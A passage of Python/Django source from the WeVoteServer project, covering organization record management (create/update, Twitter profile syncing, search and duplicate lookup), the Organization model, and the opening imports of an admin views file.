organization_twitter_handle=False, organization_email=False,
organization_facebook=False, organization_image=False,
refresh_from_twitter=False):
"""
Either update or create an organization entry.
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
organization_on_stage_found = False
new_organization_created = False
organization_on_stage = Organization()
status = "ENTERING_UPDATE_OR_CREATE_ORGANIZATION"
organization_id = convert_to_int(organization_id) if positive_value_exists(organization_id) else False
we_vote_id = we_vote_id.strip().lower() if we_vote_id else False
organization_website_search = organization_website_search.strip() if organization_website_search else False
organization_twitter_search = organization_twitter_search.strip() if organization_twitter_search else False
organization_name = organization_name.strip() if organization_name else False
organization_website = organization_website.strip() if organization_website else False
organization_twitter_handle = organization_twitter_handle.strip() if organization_twitter_handle else False
organization_email = organization_email.strip() if organization_email else False
organization_facebook = organization_facebook.strip() if organization_facebook else False
organization_image = organization_image.strip() if organization_image else False
# Values that can only be updated by a refresh_from_twitter
twitter_user_id = False
twitter_name = False
twitter_followers_count = False
twitter_profile_image_url_https = False
twitter_profile_banner_url_https = False
twitter_profile_background_image_url_https = False
twitter_description = False
twitter_location = False
twitter_url = False
# In order of authority
# 1) organization_id exists? Find it with organization_id or fail
# 2) we_vote_id exists? Find it with we_vote_id or fail
# 3) organization_website_search exists? Try to find it. If not, go to step 4
# 4) organization_twitter_search exists? Try to find it. If not, exit
success = False
if positive_value_exists(organization_id) or positive_value_exists(we_vote_id):
# If here, we know we are updating
# 1) organization_id exists? Find it with organization_id or fail
# 2) we_vote_id exists? Find it with we_vote_id or fail
organization_results = self.retrieve_organization(organization_id, we_vote_id)
if organization_results['success']:
organization_on_stage = organization_results['organization']
organization_on_stage_found = True
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
# TODO DALE Look more closely at saving the actual url from twitter (not the Twitter shortcut)
# if positive_value_exists(twitter_json['twitter_url']):
# # Use Twitter value if a value for this variable was NOT passed in
# if not positive_value_exists(organization_website):
# organization_website = twitter_json['twitter_url']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
value_changed = False
if organization_name or organization_website or organization_twitter_handle \
or organization_email or organization_facebook or organization_image:
value_changed = True
if organization_name:
organization_on_stage.organization_name = organization_name
if organization_website:
organization_on_stage.organization_website = organization_website
if organization_twitter_handle:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_email:
organization_on_stage.organization_email = organization_email
if organization_facebook:
organization_on_stage.organization_facebook = organization_facebook
if organization_image:
organization_on_stage.organization_image = organization_image
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
value_changed = True
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
if value_changed:
organization_on_stage.save()
success = True
status = "SAVED_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
success = True
status = "NO_CHANGES_SAVED_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
status = "ORGANIZATION_COULD_NOT_BE_FOUND_WITH_ORG_ID_OR_WE_VOTE_ID"
else:
try:
found_with_status = ''
# 3) organization_website_search exists? Try to find it. If not, go to step 4
if positive_value_exists(organization_website_search):
try:
organization_on_stage = Organization.objects.get(
organization_website=organization_website_search)
organization_on_stage_found = True
found_with_status = "FOUND_WITH_WEBSITE"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist as e:
# Not a problem -- an organization matching this website wasn't found
exception_does_not_exist = True
# 4) organization_twitter_search exists? Try to find it. If not, exit
if not organization_on_stage_found:
if positive_value_exists(organization_twitter_search):
try:
organization_on_stage = Organization.objects.get(
organization_twitter_handle=organization_twitter_search)
organization_on_stage_found = True
found_with_status = "FOUND_WITH_TWITTER"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
exception_multiple_object_returned = True
logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist as e:
# Not a problem -- an organization matching this twitter handle wasn't found
exception_does_not_exist = True
# 3 & 4) Save values entered in steps 3 & 4
if organization_on_stage_found:
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
value_changed = False
if organization_name or organization_website or organization_twitter_handle \
or organization_email or organization_facebook or organization_image:
value_changed = True
if organization_name:
organization_on_stage.organization_name = organization_name
if organization_website:
organization_on_stage.organization_website = organization_website
if organization_twitter_handle:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_email:
organization_on_stage.organization_email = organization_email
if organization_facebook:
organization_on_stage.organization_facebook = organization_facebook
if organization_image:
organization_on_stage.organization_image = organization_image
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
value_changed = True
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
if value_changed:
organization_on_stage.save()
success = True
status = found_with_status + " SAVED"
else:
success = True
status = found_with_status + " NO_CHANGES_SAVED"
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
if not organization_on_stage_found:
try:
# Now that we have an organization to update, get supplemental data from Twitter if
# refresh_from_twitter is true
if positive_value_exists(organization_twitter_handle) and refresh_from_twitter:
results = retrieve_twitter_user_info(organization_twitter_handle)
if results['success']:
twitter_json = results['twitter_json']
if positive_value_exists(twitter_json['id']):
twitter_user_id = convert_to_int(twitter_json['id'])
if positive_value_exists(twitter_json['name']):
twitter_name = twitter_json['name']
# Use Twitter value if a value for this variable was NOT passed in
if not positive_value_exists(organization_name):
organization_name = twitter_json['name']
twitter_followers_count = convert_to_int(twitter_json['followers_count'])
if positive_value_exists(twitter_json['profile_image_url_https']):
twitter_profile_image_url_https = twitter_json['profile_image_url_https']
if 'profile_banner_url' in twitter_json:
twitter_profile_banner_url_https = twitter_json['profile_banner_url']
twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
twitter_description = twitter_json['description']
twitter_location = twitter_json['location']
# If here, create new organization
results = Organization.objects.create_organization(organization_name, organization_website,
organization_twitter_handle, organization_email,
organization_facebook, organization_image)
if results['success']:
new_organization_created = True
success = True
status = "NEW_ORGANIZATION_CREATED_IN_UPDATE_OR_CREATE"
organization_on_stage = results['organization']
if twitter_user_id or twitter_name or twitter_followers_count or twitter_profile_image_url_https \
or twitter_profile_banner_url_https or twitter_profile_background_image_url_https \
or twitter_description or twitter_location:
# Values that can only be added by a refresh_from_twitter
if twitter_user_id:
organization_on_stage.twitter_user_id = twitter_user_id
if twitter_name:
organization_on_stage.twitter_name = twitter_name
if twitter_followers_count:
organization_on_stage.twitter_followers_count = twitter_followers_count
if twitter_profile_image_url_https:
organization_on_stage.twitter_profile_image_url_https = twitter_profile_image_url_https
if twitter_profile_banner_url_https:
organization_on_stage.twitter_profile_banner_url_https = twitter_profile_banner_url_https
if twitter_profile_background_image_url_https:
organization_on_stage.twitter_profile_background_image_url_https = \
twitter_profile_background_image_url_https
if twitter_description:
organization_on_stage.twitter_description = twitter_description
if twitter_location:
organization_on_stage.twitter_location = twitter_location
organization_on_stage.save()
status += " TWITTER_VALUES_RETRIEVED_AND_SAVED"
else:
success = False
status = results['status']
organization_on_stage = Organization()
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
success = False
status = "NEW_ORGANIZATION_COULD_NOT_BE_CREATED"
organization_on_stage = Organization()
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'organization': organization_on_stage,
'new_organization_created': new_organization_created,
}
return results
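# Hedged usage sketch of the authority order documented above (values illustrative):
# a known organization_id or we_vote_id wins; otherwise the website search and then
# the Twitter search are tried before a new record is created:
#   manager = OrganizationManager()
#   results = manager.update_or_create_organization(
#       organization_id=0, we_vote_id='',
#       organization_website_search='http://www.example-org.org',
#       organization_twitter_search='exampleorg',
#       organization_name='Example Org')
#   results['new_organization_created']  # True only if neither search matched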
def update_organization_social_media(self, organization, organization_twitter_handle=False,
organization_facebook=False):
"""
Update an organization entry with general social media data. If a value is passed in as
False, it means "Do not update".
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
success = False
status = "ENTERING_UPDATE_ORGANIZATION_SOCIAL_MEDIA"
values_changed = False
organization_twitter_handle = organization_twitter_handle.strip() if organization_twitter_handle else False
organization_facebook = organization_facebook.strip() if organization_facebook else False
# organization_image = organization_image.strip() if organization_image else False
if organization:
if organization_twitter_handle:
if organization_twitter_handle != organization.organization_twitter_handle:
organization.organization_twitter_handle = organization_twitter_handle
values_changed = True
if organization_facebook:
if organization_facebook != organization.organization_facebook:
organization.organization_facebook = organization_facebook
values_changed = True
if values_changed:
organization.save()
success = True
status = "SAVED_ORG_SOCIAL_MEDIA"
else:
success = True
status = "NO_CHANGES_SAVED_TO_ORG_SOCIAL_MEDIA"
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'organization': organization,
}
return results
def update_organization_twitter_details(self, organization, twitter_json):
"""
Update an organization entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_ORGANIZATION_TWITTER_DETAILS"
values_changed = False
if organization:
if positive_value_exists(twitter_json['id']):
if convert_to_int(twitter_json['id']) != organization.twitter_user_id:
organization.twitter_user_id = convert_to_int(twitter_json['id'])
values_changed = True
if positive_value_exists(twitter_json['screen_name']):
if twitter_json['screen_name'] != organization.organization_twitter_handle:
organization.organization_twitter_handle = twitter_json['screen_name']
values_changed = True
if positive_value_exists(twitter_json['name']):
if twitter_json['name'] != organization.twitter_name:
organization.twitter_name = twitter_json['name']
values_changed = True
if positive_value_exists(twitter_json['followers_count']):
if convert_to_int(twitter_json['followers_count']) != organization.twitter_followers_count:
organization.twitter_followers_count = convert_to_int(twitter_json['followers_count'])
values_changed = True
if positive_value_exists(twitter_json['profile_image_url_https']):
if twitter_json['profile_image_url_https'] != organization.twitter_profile_image_url_https:
organization.twitter_profile_image_url_https = twitter_json['profile_image_url_https']
values_changed = True
if 'profile_banner_url' in twitter_json and positive_value_exists(twitter_json['profile_banner_url']):
if twitter_json['profile_banner_url'] != organization.twitter_profile_banner_url_https:
organization.twitter_profile_banner_url_https = twitter_json['profile_banner_url']
values_changed = True
if positive_value_exists(twitter_json['profile_background_image_url_https']):
if twitter_json['profile_background_image_url_https'] != \
organization.twitter_profile_background_image_url_https:
organization.twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
values_changed = True
if positive_value_exists(twitter_json['description']):
if twitter_json['description'] != organization.twitter_description:
organization.twitter_description = twitter_json['description']
values_changed = True
if positive_value_exists(twitter_json['location']):
if twitter_json['location'] != organization.twitter_location:
organization.twitter_location = twitter_json['location']
values_changed = True
if values_changed:
organization.save()
success = True
status = "SAVED_ORG_TWITTER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_ORG_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
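# Hedged sketch of the minimal twitter_json shape this method reads; the keys mirror
# the fields accessed above, and the values are illustrative:
#   twitter_json = {
#       'id': 1234567890, 'screen_name': 'exampleorg', 'name': 'Example Org',
#       'followers_count': 25000,
#       'profile_image_url_https': 'https://example.com/photo_normal.jpg',
#       'profile_background_image_url_https': '', 'description': '', 'location': '',
#   }
#   OrganizationManager().update_organization_twitter_details(organization, twitter_json)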
def clear_organization_twitter_details(self, organization):
"""
Clear the Twitter details stored on an organization entry.
"""
success = False
status = "ENTERING_UPDATE_ORGANIZATION_TWITTER_DETAILS"
if organization:
organization.twitter_user_id = 0
# We leave the handle in place
# organization.organization_twitter_handle = ""
organization.twitter_name = ''
organization.twitter_followers_count = 0
organization.twitter_profile_image_url_https = ''
organization.twitter_description = ''
organization.twitter_location = ''
organization.save()
success = True
status = "CLEARED_ORG_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
def delete_organization(self, organization_id):
organization_id = convert_to_int(organization_id)
organization_deleted = False
try:
if organization_id:
results = self.retrieve_organization(organization_id)
if results['organization_found']:
organization = results['organization']
organization_id = organization.id
organization.delete()
organization_deleted = True
except Exception as e:
handle_exception(e, logger=logger)
results = {
'success': organization_deleted,
'organization_deleted': organization_deleted,
'organization_id': organization_id,
}
return results
class OrganizationListManager(models.Manager):
"""
A class for working with lists of Organizations
"""
def organization_search_find_any_possibilities(self, organization_name, organization_twitter_handle='',
organization_website='', organization_email='',
organization_facebook=''):
"""
We want to find *any* possible organization that includes any of the search terms
:param organization_name:
:param organization_twitter_handle:
:param organization_website:
:param organization_email:
:param organization_facebook:
:return:
"""
organization_list_for_json = []
try:
filters = []
organization_list_for_json = []
organization_objects_list = []
if positive_value_exists(organization_name):
new_filter = Q(organization_name__icontains=organization_name)
# # Find entries with any word in the string - DALE 2016-05-06 This didn't feel right
# from functools import reduce
# organization_name_list = organization_name.split(" ")
# new_filter = reduce(lambda x, y: x | y,
# [Q(organization_name__icontains=word) for word in organization_name_list])
filters.append(new_filter)
if positive_value_exists(organization_twitter_handle):
new_filter = Q(organization_twitter_handle__icontains=organization_twitter_handle)
filters.append(new_filter)
if positive_value_exists(organization_website):
new_filter = Q(organization_website__icontains=organization_website)
filters.append(new_filter)
if positive_value_exists(organization_email):
new_filter = Q(organization_email__icontains=organization_email)
filters.append(new_filter)
if positive_value_exists(organization_facebook):
new_filter = Q(organization_facebook__icontains=organization_facebook)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
organization_objects_list = Organization.objects.filter(final_filters)
if len(organization_objects_list):
organizations_found = True
status = 'ORGANIZATIONS_RETRIEVED'
for organization in organization_objects_list:
one_organization_json = {
'organization_id': organization.id,
'organization_we_vote_id': organization.we_vote_id,
'organization_name':
organization.organization_name if positive_value_exists(
organization.organization_name) else '',
'organization_website': organization.organization_website if positive_value_exists(
organization.organization_website) else '',
'organization_twitter_handle':
organization.organization_twitter_handle if positive_value_exists(
organization.organization_twitter_handle) else '',
'organization_email':
organization.organization_email if positive_value_exists(
organization.organization_email) else '',
'organization_facebook':
organization.organization_facebook if positive_value_exists(
organization.organization_facebook) else '',
}
organization_list_for_json.append(one_organization_json)
else:
organizations_found = False
status = 'NO_ORGANIZATIONS_RETRIEVED'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
organizations_found = False
status = 'NO_ORGANIZATIONS_FOUND_DoesNotExist'
success = True # We are still successful if no organizations are found
except Exception as e:
organizations_found = False
handle_exception(e, logger=logger)
status = 'FAILED organization_search_find_any_possibilities ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'status': status,
'success': success,
'organizations_found': organizations_found,
'organizations_list': organization_list_for_json,
}
return results
def retrieve_organizations_by_id_list(self, organization_ids_followed_by_voter):
organization_list = []
organization_list_found = False
if not isinstance(organization_ids_followed_by_voter, list):
status = 'NO_ORGANIZATIONS_FOUND_MISSING_ORGANIZATION_LIST'
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
if not len(organization_ids_followed_by_voter):
status = 'NO_ORGANIZATIONS_FOUND_NO_ORGANIZATIONS_IN_LIST'
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
try:
organization_queryset = Organization.objects.all()
organization_queryset = organization_queryset.filter(
id__in=organization_ids_followed_by_voter)
organization_queryset = organization_queryset.order_by('organization_name')
organization_list = organization_queryset
if len(organization_list):
organization_list_found = True
status = 'ORGANIZATIONS_FOUND_BY_ORGANIZATION_LIST'
else:
status = 'NO_ORGANIZATIONS_FOUND_BY_ORGANIZATION_LIST'
success = True
except Exception as e:
status = 'retrieve_organizations_by_id_list: Unable to retrieve organizations from db. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
def retrieve_organizations_from_non_unique_identifiers(self, twitter_handle):
organization_list_objects = []
organization_list_found = False
twitter_handle_filtered = extract_twitter_handle_from_text_string(twitter_handle)
try:
organization_queryset = Organization.objects.all()
organization_queryset = organization_queryset.filter(
organization_twitter_handle__iexact=twitter_handle_filtered)
# If multiple organizations claim the same Twitter handle, select the one with... ??
# organization_queryset = organization_queryset.order_by('-twitter_followers_count')
organization_list_objects = organization_queryset
if len(organization_list_objects):
organization_list_found = True
status = 'ORGANIZATIONS_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
else:
status = 'NO_ORGANIZATIONS_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
status = 'NO_ORGANIZATIONS_FOUND_FROM_TWITTER_HANDLE_DoesNotExist'
organization_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_organizations_from_non_unique_identifiers ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list_objects,
}
return results
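# Hedged usage sketch; exactly how extract_twitter_handle_from_text_string normalizes
# its input (e.g. stripping an "@" or a full twitter.com URL) is an assumption here:
#   OrganizationListManager().retrieve_organizations_from_non_unique_identifiers('@ExampleOrg')
#   # -> matches rows whose organization_twitter_handle is "exampleorg", case-insensitively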
def retrieve_possible_duplicate_organizations(self, organization_name, organization_twitter_handle, vote_smart_id,
we_vote_id_from_master=''):
organization_list_objects = []
filters = []
organization_list_found = False
try:
organization_queryset = Organization.objects.all()
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
organization_queryset = organization_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find organizations with *any* of these values
if positive_value_exists(organization_name):
new_filter = Q(organization_name__iexact=organization_name)
filters.append(new_filter)
if positive_value_exists(organization_twitter_handle):
new_filter = Q(organization_twitter_handle__iexact=organization_twitter_handle)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
organization_queryset = organization_queryset.filter(final_filters)
organization_list_objects = organization_queryset
if len(organization_list_objects):
organization_list_found = True
status = 'DUPLICATE_ORGANIZATIONS_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_ORGANIZATIONS_RETRIEVED'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
status = 'NO_DUPLICATE_ORGANIZATIONS_FOUND_DoesNotExist'
organization_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_organizations ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list_objects,
}
return results
class Organization(models.Model):
# We are relying on the built-in Django id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our org info with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "org", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_org_integer
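# Example of the resulting format (illustrative): "wv" + "3v" + "org" + "123" -> "wv3vorg123"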
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, null=True, blank=True, unique=True)
organization_name = models.CharField(
verbose_name="organization name", max_length=255, null=False, blank=False)
organization_website = models.URLField(verbose_name='url of the endorsing organization', blank=True, null=True)
organization_email = models.EmailField(
verbose_name='organization contact email address', max_length=255, unique=False, null=True, blank=True)
organization_contact_name = models.CharField(max_length=255, null=True, unique=False)
organization_facebook = models.URLField(verbose_name='url of facebook page', blank=True, null=True)
organization_image = models.CharField(verbose_name='organization image', max_length=255, null=True, unique=False)
state_served_code = models.CharField(verbose_name="state this organization serves", max_length=2,
null=True, blank=True)
# The vote_smart special interest group sigId for this organization
vote_smart_id = models.BigIntegerField(
verbose_name="vote smart special interest group id", null=True, blank=True, unique=True)
organization_description = models.TextField(
verbose_name="Text description of this organization.", null=True, blank=True)
organization_address = models.CharField(
verbose_name='organization street address', max_length=255, unique=False, null=True, blank=True)
organization_city = models.CharField(max_length=255, null=True, blank=True)
organization_state = models.CharField(max_length=2, null=True, blank=True)
organization_zip = models.CharField(max_length=255, null=True, blank=True)
organization_phone1 = models.CharField(max_length=255, null=True, blank=True)
organization_phone2 = models.CharField(max_length=255, null=True, blank=True)
organization_fax = models.CharField(max_length=255, null=True, blank=True)
twitter_user_id = models.BigIntegerField(verbose_name="twitter id", null=True, blank=True)
organization_twitter_handle = models.CharField(
verbose_name='organization twitter screen_name', max_length=255, null=True, unique=False)
twitter_name = models.CharField(
verbose_name="org name from twitter", max_length=255, null=True, blank=True)
twitter_location = models.CharField(
verbose_name="org location from twitter", max_length=255, null=True, blank=True)
twitter_followers_count = models.IntegerField(verbose_name="number of twitter followers",
null=False, blank=True, default=0)
twitter_profile_image_url_https = models.URLField(verbose_name='url of user logo from twitter',
blank=True, null=True)
twitter_profile_background_image_url_https = models.URLField(verbose_name='tile-able background from twitter',
blank=True, null=True)
twitter_profile_banner_url_https = models.URLField(verbose_name='profile banner image from twitter',
blank=True, null=True)
twitter_description = models.CharField(verbose_name="Text description of this organization from twitter.",
max_length=255, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_thumbnail_url = models.URLField(verbose_name='url of wikipedia logo thumbnail', blank=True, null=True)
wikipedia_thumbnail_width = models.IntegerField(verbose_name="width of photo", null=True, blank=True)
wikipedia_thumbnail_height = models.IntegerField(verbose_name="height of photo", null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
NONPROFIT_501C3 = '3'
NONPROFIT_501C4 = '4'
POLITICAL_ACTION_COMMITTEE = 'P'
CORPORATION = 'C'
NEWS_CORPORATION = 'N'
UNKNOWN = 'U'
ORGANIZATION_TYPE_CHOICES = (
(NONPROFIT_501C3, 'Nonprofit 501c3'),
(NONPROFIT_501C4, 'Nonprofit 501c4'),
(POLITICAL_ACTION_COMMITTEE, 'Political Action Committee'),
(CORPORATION, 'Corporation'),
(NEWS_CORPORATION, 'News Corporation'),
(UNKNOWN, 'Unknown'),
)
organization_type = models.CharField(
verbose_name="type of org", max_length=1, choices=ORGANIZATION_TYPE_CHOICES, default=UNKNOWN)
def __unicode__(self):
return str(self.organization_name)
def organization_photo_url(self):
if positive_value_exists(self.organization_image):
return self.organization_image
elif positive_value_exists(self.twitter_profile_image_url_https):
return self.twitter_profile_image_url_https_bigger()
elif positive_value_exists(self.wikipedia_photo_url):
return self.wikipedia_photo_url
return ''
def twitter_profile_image_url_https_bigger(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "_bigger")
else:
return ''
def twitter_profile_image_url_https_original(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "")
else:
return ''
class Meta:
ordering = ('organization_name',)
objects = OrganizationManager()
@classmethod
def create(cls, organization_name, organization_website, organization_twitter_handle, organization_email,
organization_facebook, organization_image):
organization = cls(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
return organization
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this organization came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_org_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "org" = tells us this is a unique id for an org
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}org{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
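            # For example (per the format described above), prefix "3v" and
            # next integer 123 yield the we_vote_id "wv3vorg123".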
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
super(Organization, self).save(*args, **kwargs)
    def is_nonprofit_501c3(self):
        # Use equality rather than substring membership ("in"): an empty
        # organization_type would otherwise match every type, since "" is a
        # substring of any string.
        return self.organization_type == self.NONPROFIT_501C3
    def is_nonprofit_501c4(self):
        return self.organization_type == self.NONPROFIT_501C4
    def is_political_action_committee(self):
        return self.organization_type == self.POLITICAL_ACTION_COMMITTEE
    def is_corporation(self):
        return self.organization_type == self.CORPORATION
    def is_news_corporation(self):
        return self.organization_type == self.NEWS_CORPORATION
def is_organization_type_specified(self):
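        # True for every defined type except UNKNOWN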
return self.organization_type in (
self.NONPROFIT_501C3, self.NONPROFIT_501C4, self.POLITICAL_ACTION_COMMITTEE,
self.CORPORATION, self.NEWS_CORPORATION)
def generate_facebook_link(self):
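        # e.g. an organization_facebook value of "wevote" yields
        # "https://facebook.com/wevote"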
if self.organization_facebook:
return "https://facebook.com/{facebook_page}".format(facebook_page=self.organization_facebook)
else:
return ''
def generate_twitter_link(self):
if self.organization_twitter_handle:
return "https://twitter.com/{twitter_handle}".format(twitter_handle=self.organization_twitter_handle)
else:
return ''
def generate_wikipedia_link(self):
if self.wikipedia_page_title:
encoded_page_title = self.wikipedia_page_title.replace(" ", "_")
return "https://en.wikipedia.org/wiki/{page_title}".format(page_title=encoded_page_title)
else:
return ''
```
#### File: WeVoteServer/organization/views_admin.py
```python
from .controllers import organizations_import_from_master_server
from .models import Organization
from .serializers import OrganizationSerializer
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaign, CandidateCampaignListManager, CandidateCampaignManager
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from exception.models import handle_record_found_more_than_one_exception,\
handle_record_not_deleted_exception, handle_record_not_found_exception, handle_record_not_saved_exception
from election.models import Election, ElectionManager
from measure.models import ContestMeasure, ContestMeasureList, ContestMeasureManager
from organization.models import OrganizationListManager, OrganizationManager
from position.models import PositionEntered, PositionEnteredManager, INFORMATION_ONLY, OPPOSE, \
STILL_DECIDING, SUPPORT
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import retrieve_voter_authority, voter_has_authority
from voter_guide.models import VoterGuideManager
import wevote_functions.admin
